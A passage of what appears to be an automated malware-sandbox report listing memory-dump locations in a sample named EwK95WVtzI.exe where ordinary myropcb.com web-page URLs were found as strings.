EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/services-capabilities/stencil/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/testimonial/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/about-us/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/agents-brokers/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/awards-certificates/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/our-facilities/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/privacy-policy/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/referral-program/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/rohs/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/satisfaction-guarantee/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/shipping-cost/
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1549093222.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1633194064.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2377412406.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2258575246.0000000003980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.myropcb.com/why-use-myro/terms-of-service/
